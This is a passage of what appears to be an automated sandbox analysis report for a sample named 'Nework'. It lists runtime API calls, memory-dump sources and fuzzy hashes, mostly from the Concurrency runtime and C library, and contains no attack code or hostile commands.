                                                                            • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 001B7279
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 001B72A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
                                                                            • String ID: count$ppVirtualProcessorRoots
                                                                            • API String ID: 3791123369-3650809737
                                                                            • Opcode ID: 158ea4d3696640fb42a2c7935f7af2f92348c40f5c7376fa476966676e4898a1
                                                                            • Instruction ID: b17cee8e6c294b52f3cdb575e6b286844a7506930a2bdcbc23544d51abd87e9d
                                                                            • Opcode Fuzzy Hash: 158ea4d3696640fb42a2c7935f7af2f92348c40f5c7376fa476966676e4898a1
                                                                            • Instruction Fuzzy Hash: 6A217134E04609AFCF14EF99C595AEDBBB5BF59350F1440A9E901AB391DB30AE41CF90
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 001B6C96
                                                                            • GetCurrentProcess.KERNEL32 ref: 001B6C9E
                                                                            • DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 001B6CB3
                                                                            • SafeRWList.LIBCONCRT ref: 001B6CD3
                                                                              • Part of subcall function 001B4CCE: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 001B4CDF
                                                                              • Part of subcall function 001B4CCE: List.LIBCMT ref: 001B4CE9
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 001B6CE5
                                                                            • GetLastError.KERNEL32 ref: 001B6CF4
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001B6D0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                            • String ID: eventObject
                                                                            • API String ID: 165577817-1680012138
                                                                            • Opcode ID: 586302e16ad16a7af2d325436426d108108ed7cc276700fc8eb284bf8bbc1242
                                                                            • Instruction ID: e283d2c9bba96e07c5ee4bd75b08178d3b5d078d3cdc2e20455dbf094980c138
                                                                            • Opcode Fuzzy Hash: 586302e16ad16a7af2d325436426d108108ed7cc276700fc8eb284bf8bbc1242
                                                                            • Instruction Fuzzy Hash: AE11E971500214EBDB14EBE4DD8AFEE37B8AF24750F204025F505EA0D2EBB4DA44CB60
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e372308c3553ec625dc53b4d7818465adab2752da869ce8d5756dc97c60fa6fb
                                                                            • Instruction ID: 833e428e37d491a025abaac4628506ffeb9d1874f1c2896ed4c2c60ba67ab8a8
                                                                            • Opcode Fuzzy Hash: e372308c3553ec625dc53b4d7818465adab2752da869ce8d5756dc97c60fa6fb
                                                                            • Instruction Fuzzy Hash: 20C11470E04685DFCB16CF98D881FAEBBB2BF59340F14405AE915AB392CB749941CF60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                            • String ID:
                                                                            • API String ID: 3943753294-0
                                                                            • Opcode ID: a94bfc6d393811552d0f38e825cec7ee3bef176248f6dc15a90f2848827b02e6
                                                                            • Instruction ID: 7f25c914041b80e758ee4f0af43f6e4255b62363d345cdaeadc7b418e1651eca
                                                                            • Opcode Fuzzy Hash: a94bfc6d393811552d0f38e825cec7ee3bef176248f6dc15a90f2848827b02e6
                                                                            • Instruction Fuzzy Hash: 81515879A00206CFCF15DF64C9D59AD77A0BF0A710B258069E8069F661DB30ED81CBA5
                                                                            APIs
                                                                            • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 001B7763
                                                                              • Part of subcall function 001B5B18: __EH_prolog3_catch.LIBCMT ref: 001B5B1F
                                                                              • Part of subcall function 001B5B18: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 001B5B58
                                                                            • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 001B7771
                                                                              • Part of subcall function 001B677D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 001B67A2
                                                                              • Part of subcall function 001B677D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 001B67C5
                                                                            • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 001B778A
                                                                            • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 001B7796
                                                                              • Part of subcall function 001B5B18: RtlInterlockedPopEntrySList.NTDLL(?), ref: 001B5BA1
                                                                              • Part of subcall function 001B5B18: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 001B5BD0
                                                                              • Part of subcall function 001B5B18: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 001B5BDE
                                                                            • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 001B77E2
                                                                            • Concurrency::location::_Assign.LIBCMT ref: 001B7803
                                                                            • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 001B780B
                                                                            • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 001B781D
                                                                            • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 001B784D
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                                                                            • String ID:
                                                                            • API String ID: 2678502038-0
                                                                            • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                            • Instruction ID: 7f1c7fff146c55dd0e7bddc35242d57fba26adedf0c592af0a5e22025d1d4375
                                                                            • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                            • Instruction Fuzzy Hash: 01312530B0C2556FDF16AA78849A7FEBBB65F95300F0444A9D845DB2C2DB258D4AC3A1
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 001C07FB
                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,001B5B0E,?), ref: 001C080D
                                                                            • GetCurrentThread.KERNEL32 ref: 001C0815
                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,001B5B0E,?), ref: 001C081D
                                                                            • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,001B5B0E,?), ref: 001C0836
                                                                            • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 001C0857
                                                                              • Part of subcall function 001B0071: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 001B008B
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,001B5B0E,?), ref: 001C0869
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,001B5B0E,?), ref: 001C0894
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001C08AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                                                                            • String ID:
                                                                            • API String ID: 1293880212-0
                                                                            • Opcode ID: 4971fe4651de635b47498bf4b49a3819013fdaf67ecd35b39735b0a6ce9004c6
                                                                            • Instruction ID: e2a085087d93edf99d173c775c0c53278efb833ab221188c96a099f27c4732f7
                                                                            • Opcode Fuzzy Hash: 4971fe4651de635b47498bf4b49a3819013fdaf67ecd35b39735b0a6ce9004c6
                                                                            • Instruction Fuzzy Hash: 6C11B475A40345EBD712ABB49D8AF9E3BA89F2D740F084039F945DE151EBB0C9808BB1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                            • String ID:
                                                                            • API String ID: 3409252457-0
                                                                            • Opcode ID: 852c7affbd9bb5add62355c7e07e05e727d8292a2f4c866ce488cfcd390e1c91
                                                                            • Instruction ID: cc97f64882bf501eea967b102f55a2935f0dee7fb4ea6db1459b1f088fccb0ec
                                                                            • Opcode Fuzzy Hash: 852c7affbd9bb5add62355c7e07e05e727d8292a2f4c866ce488cfcd390e1c91
                                                                            • Instruction Fuzzy Hash: FC510171908346AFDB24AFB49882F6DBBE5FF31314B14416EE6119B282EB71CA41CB51
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 001C46D7
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 001C46DF
                                                                            • _ValidateLocalCookies.LIBCMT ref: 001C4768
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 001C4793
                                                                            • _ValidateLocalCookies.LIBCMT ref: 001C47E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: ebf76d3b34143125ef72ff24cb878093bf42775c7b0ec211c81f00b3ee703a45
                                                                            • Instruction ID: 5968e12114dc63c7a3caf6beef520daf9ba4efa2fd14f3d21d0736f0bf7a4b57
                                                                            • Opcode Fuzzy Hash: ebf76d3b34143125ef72ff24cb878093bf42775c7b0ec211c81f00b3ee703a45
                                                                            • Instruction Fuzzy Hash: 4F41F134A04308ABCF10DF68C894FAEBBB6BF66314F148159E8149B392C735EA51CF90
                                                                            APIs
                                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 001C199F
                                                                              • Part of subcall function 001C1C6E: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,001C16E7), ref: 001C1C7E
                                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 001C19B4
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C19C3
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C1A87
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                                                                            • String ID: pContext$switchState
                                                                            • API String ID: 1312548968-2660820399
                                                                            • Opcode ID: 457dff11ede00aeced5a68220468a344c13f47865f036f2bd1287145649ce96c
                                                                            • Instruction ID: 4cec894c5e6472b4b545e8211a80ce972fcf2a9d6e7bb4a9f09451d76ab8a8c9
                                                                            • Opcode Fuzzy Hash: 457dff11ede00aeced5a68220468a344c13f47865f036f2bd1287145649ce96c
                                                                            • Instruction Fuzzy Hash: A731A135A40214ABCF05EF68C895F6D73B9BF66314F214569E811A7293DB70EE018A90
                                                                            APIs
                                                                            • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 001BE637
                                                                              • Part of subcall function 001BE3A4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 001BE3D7
                                                                              • Part of subcall function 001BE3A4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 001BE3F9
                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BE6B4
                                                                            • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 001BE6C0
                                                                            • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 001BE6CF
                                                                            • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 001BE6D9
                                                                            • Concurrency::location::_Assign.LIBCMT ref: 001BE70D
                                                                            • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 001BE715
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                            • String ID:
                                                                            • API String ID: 1924466884-0
                                                                            • Opcode ID: 7e9dd48c4b0b0ee7bc4ac9e3e15676d2f29e8b355db4ca4cb1f4bff7fc58ba7b
                                                                            • Instruction ID: cef2b752d87713d95bb4326d392d7c0c2e36d51b91251c08fe5d5b17e7ef2918
                                                                            • Opcode Fuzzy Hash: 7e9dd48c4b0b0ee7bc4ac9e3e15676d2f29e8b355db4ca4cb1f4bff7fc58ba7b
                                                                            • Instruction Fuzzy Hash: 9B414935A002159FCF05EFA4C894AEDB7F5FF58310F1980A9ED499B282DB30A941CB91
                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(?,00198610,00000000), ref: 001CFAF7
                                                                            • __fassign.LIBCMT ref: 001CFCD6
                                                                            • __fassign.LIBCMT ref: 001CFCF3
                                                                            • WriteFile.KERNEL32(?,00198610,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001CFD3B
                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001CFD7B
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 001CFE27
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                            • String ID:
                                                                            • API String ID: 4031098158-0
                                                                            • Opcode ID: 1a9ee16d866298c631d1d672401aa5bf29ec624afaa99848cf60cde8a26166e8
                                                                            • Instruction ID: 04d901b60bd8822211619f287a0ea0801d31c110f75ec6a08dbeeb767e498a97
                                                                            • Opcode Fuzzy Hash: 1a9ee16d866298c631d1d672401aa5bf29ec624afaa99848cf60cde8a26166e8
                                                                            • Instruction Fuzzy Hash: 60D16B75D002589FCB15CFE8C890EEDBBB6AF58314F28416DE856AB252D730AD46CB50
                                                                            APIs
                                                                            • Concurrency::location::_Assign.LIBCMT ref: 001BE77E
                                                                            • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 001BE786
                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BE7B0
                                                                            • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 001BE7B9
                                                                            • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 001BE83C
                                                                            • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 001BE844
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                                                                            • String ID:
                                                                            • API String ID: 3929269971-0
                                                                            • Opcode ID: 56443e272866666c47c60ffac640d693851b9d709975d5efd615e1a95ed2fa63
                                                                            • Instruction ID: a1aaff458fa3c3166fd5b210e4136f7337d3df70b2d141ef2a8febfbd3cce7be
                                                                            • Opcode Fuzzy Hash: 56443e272866666c47c60ffac640d693851b9d709975d5efd615e1a95ed2fa63
                                                                            • Instruction Fuzzy Hash: 1C414035B00615AFCB09DFA8C494AEDB7F5FF48310F058159E9069B790CB74AE41CB81
                                                                            APIs
                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFA89
                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFA8F
                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFABC
                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFAC6
                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFAD8
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001AFAEE
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                            • String ID:
                                                                            • API String ID: 2808382621-0
                                                                            • Opcode ID: 854ce92bb0519d2d07434c8a3719907600c337dab29a9f06b3a37997fd710f57
                                                                            • Instruction ID: 912e9161a252ba74af23d9a4e6fc3707ba617f52e9a9bddee0267746c1e0ff0d
                                                                            • Opcode Fuzzy Hash: 854ce92bb0519d2d07434c8a3719907600c337dab29a9f06b3a37997fd710f57
                                                                            • Instruction Fuzzy Hash: B801B139540155ABD711BBE5DC89BFF37A8EF52351B140829F409E6090EB70D945C760
                                                                            Strings
